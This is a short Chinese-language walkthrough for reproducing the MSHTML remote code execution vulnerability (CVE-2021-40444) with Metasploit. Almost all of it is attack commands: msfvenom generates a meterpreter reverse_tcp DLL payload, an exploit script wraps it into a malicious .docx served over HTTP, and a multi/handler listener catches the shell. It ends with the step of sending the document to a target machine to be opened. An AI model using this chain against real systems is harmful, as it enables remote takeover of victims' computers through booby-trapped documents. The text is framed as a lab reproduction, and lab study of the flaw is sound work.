尝试使用 Metasploit Framework 复现 Microsoft MSHTML 远程代码执行(RCE)漏洞。
最好不要在 FlareVM 中运行
从 https://github.com/lockedbyte/CVE-2021-40444 Git 克隆仓库
准备稍后与 msfvenom 一起使用的 .dll 模板
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
将刚刚生成的 template.dll 复制到仓库中的 test/ 文件夹
通过 chmod +x template.dll 为 template.dll 赋予可执行权限
运行脚本,将 template.dll 处理为 output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>文档随后将导出到 out/ 文件夹,我们可以在 HTTP 端口(默认为 80)上建立监听器
python3 exploit.py host 80
运行 Metasploit:
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
然后我们可以将 document.docx 发送到目标机器并执行该 .docx
我们将在 exploit.py 终端中收到响应,如果我们能够成功生成 reverse tcp shell,则实验成功。